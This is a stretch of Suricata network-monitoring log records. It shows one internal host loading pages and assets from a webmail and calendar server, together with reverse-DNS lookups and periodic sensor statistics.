{"timestamp":"2020-02-29T00:26:27.958422+0000","flow_id":1660149541607404,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53162,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108}} {"timestamp":"2020-02-29T00:26:28.000774+0000","flow_id":1144869425108000,"event_type":"flow","src_ip":"192.168.10.130","src_port":34292,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":176,"pkts_toclient":348,"bytes_toserver":18553,"bytes_toclient":494833,"start":"2020-02-29T00:25:09.513056+0000","end":"2020-02-29T00:25:25.099949+0000","age":16,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:28.064141+0000","flow_id":350253235803601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49429,"proto":"UDP","dns":{"type":"answer","id":14196,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:28.064141+0000","flow_id":350253235803601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49429,"proto":"UDP","dns":{"type":"answer","id":14196,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:28.111618+0000","flow_id":467437123496173,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53160,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122}} {"timestamp":"2020-02-29T00:26:28.111618+0000","flow_id":467437123496173,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53160,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:26:30.000707+0000","flow_id":541469470307065,"event_type":"flow","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":27,"pkts_toclient":30,"bytes_toserver":5429,"bytes_toclient":24522,"start":"2020-02-29T00:25:19.013049+0000","end":"2020-02-29T00:25:29.452530+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:32.959634+0000","flow_id":1660149541607404,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53162,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tab.png","state":"CLOSED","stored":false,"size":108,"tx_id":0}} {"timestamp":"2020-02-29T00:26:33.000861+0000","flow_id":1107327101640732,"event_type":"flow","src_ip":"192.168.10.122","src_port":41965,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:21:31.925724+0000","end":"2020-02-29T00:21:32.037252+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:33.118390+0000","flow_id":467437123496173,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53160,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":127,"tx_id":0}} {"timestamp":"2020-02-29T00:26:34.000207+0000","event_type":"stats","stats":{"uptime":15246,"capture":{"kernel_packets":142142,"kernel_drops":0},"decoder":{"pkts":142143,"bytes":97641084,"invalid":195,"ipv4":140548,"ipv6":10,"ethernet":142143,"raw":0,"null":0,"sll":0,"tcp":134958,"udp":5380,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087552},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2917,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2933,"synack":2924,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2461,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2545}},"flow_mgr":{"closed_pruned":2897,"new_pruned":17,"est_pruned":2545,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10561,"memcap_state":0,"memcap_global":0},"http":{"memuse":720,"memcap":0}}} {"timestamp":"2020-02-29T00:26:38.001255+0000","flow_id":536109336509111,"event_type":"flow","src_ip":"192.168.10.122","src_port":38791,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:21:36.998071+0000","end":"2020-02-29T00:21:37.106785+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:39.000856+0000","flow_id":407294692922328,"event_type":"flow","src_ip":"192.168.10.81","src_port":53140,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1415,"bytes_toclient":6320,"start":"2020-02-29T00:25:33.627672+0000","end":"2020-02-29T00:25:38.952415+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:41.000179+0000","event_type":"stats","stats":{"uptime":15253,"capture":{"kernel_packets":142145,"kernel_drops":0},"decoder":{"pkts":142149,"bytes":97641480,"invalid":195,"ipv4":140554,"ipv6":10,"ethernet":142149,"raw":0,"null":0,"sll":0,"tcp":134964,"udp":5380,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086688},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2917,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2933,"synack":2924,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2461,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2545}},"flow_mgr":{"closed_pruned":2898,"new_pruned":17,"est_pruned":2547,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10230,"memcap_state":0,"memcap_global":0},"http":{"memuse":640,"memcap":0}}} {"timestamp":"2020-02-29T00:26:45.000717+0000","flow_id":681193347724086,"event_type":"flow","src_ip":"192.168.10.81","src_port":53146,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1393,"bytes_toclient":6320,"start":"2020-02-29T00:25:39.439094+0000","end":"2020-02-29T00:25:44.703225+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:48.000214+0000","event_type":"stats","stats":{"uptime":15260,"capture":{"kernel_packets":142149,"kernel_drops":0},"decoder":{"pkts":142237,"bytes":97725258,"invalid":195,"ipv4":140642,"ipv6":10,"ethernet":142237,"raw":0,"null":0,"sll":0,"tcp":135052,"udp":5380,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086688},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2918,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2934,"synack":2925,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2461,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2545}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2547,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10230,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:26:50.650903+0000","flow_id":690229963583127,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55832,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19892,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:50.759669+0000","flow_id":690229963583127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55832,"proto":"UDP","dns":{"type":"answer","id":19892,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:50.759669+0000","flow_id":690229963583127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55832,"proto":"UDP","dns":{"type":"answer","id":19892,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:53.000483+0000","flow_id":2032669216969740,"event_type":"flow","src_ip":"192.168.10.122","src_port":33731,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:51.889868+0000","end":"2020-02-29T00:21:52.001579+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:55.000159+0000","event_type":"stats","stats":{"uptime":15267,"capture":{"kernel_packets":142248,"kernel_drops":0},"decoder":{"pkts":142254,"bytes":97728544,"invalid":196,"ipv4":140657,"ipv6":10,"ethernet":142254,"raw":0,"null":0,"sll":0,"tcp":135064,"udp":5382,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086976},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2919,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2935,"synack":2926,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2462,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2546}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2548,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10230,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:26:57.000181+0000","flow_id":1410057873142980,"event_type":"flow","src_ip":"192.168.10.122","src_port":60566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:56.275652+0000","end":"2020-02-29T00:21:56.384455+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:57.000808+0000","flow_id":1686898580184385,"event_type":"flow","src_ip":"192.168.10.122","src_port":35597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:56.580929+0000","end":"2020-02-29T00:21:56.692104+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:59.391250+0000","flow_id":1875606578133074,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55048,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18473,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:59.499528+0000","flow_id":1875606578133074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55048,"proto":"UDP","dns":{"type":"answer","id":18473,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:59.499528+0000","flow_id":1875606578133074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55048,"proto":"UDP","dns":{"type":"answer","id":18473,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:59.699545+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8085}} {"timestamp":"2020-02-29T00:27:02.000204+0000","event_type":"stats","stats":{"uptime":15274,"capture":{"kernel_packets":142262,"kernel_drops":0},"decoder":{"pkts":142279,"bytes":97739194,"invalid":196,"ipv4":140680,"ipv6":10,"ethernet":142279,"raw":0,"null":0,"sll":0,"tcp":135085,"udp":5384,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086976},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2920,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2936,"synack":2927,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1924,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2463,"failed_udp":116},"tx":{"http":5024,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2547}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2550,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9900,"memcap_state":0,"memcap_global":0},"http":{"memuse":86179,"memcap":0}}} {"timestamp":"2020-02-29T00:27:04.287799+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8085},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47025,"tx_id":0}} {"timestamp":"2020-02-29T00:27:04.298851+0000","flow_id":848495214366563,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51720,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45791,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:04.407027+0000","flow_id":848495214366563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51720,"proto":"UDP","dns":{"type":"answer","id":45791,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:04.407027+0000","flow_id":848495214366563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51720,"proto":"UDP","dns":{"type":"answer","id":45791,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:04.518331+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8529}} {"timestamp":"2020-02-29T00:27:04.548359+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8529},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36696,"tx_id":1}} {"timestamp":"2020-02-29T00:27:04.556000+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} {"timestamp":"2020-02-29T00:27:04.558855+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/mime.css","state":"CLOSED","stored":false,"size":211,"tx_id":2}} {"timestamp":"2020-02-29T00:27:04.559330+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980}} {"timestamp":"2020-02-29T00:27:04.568875+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":24076,"tx_id":3}} {"timestamp":"2020-02-29T00:27:04.569324+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881}} {"timestamp":"2020-02-29T00:27:04.570867+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733}} {"timestamp":"2020-02-29T00:27:04.572003+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpcore.js","state":"CLOSED","stored":false,"size":13894,"tx_id":4}} 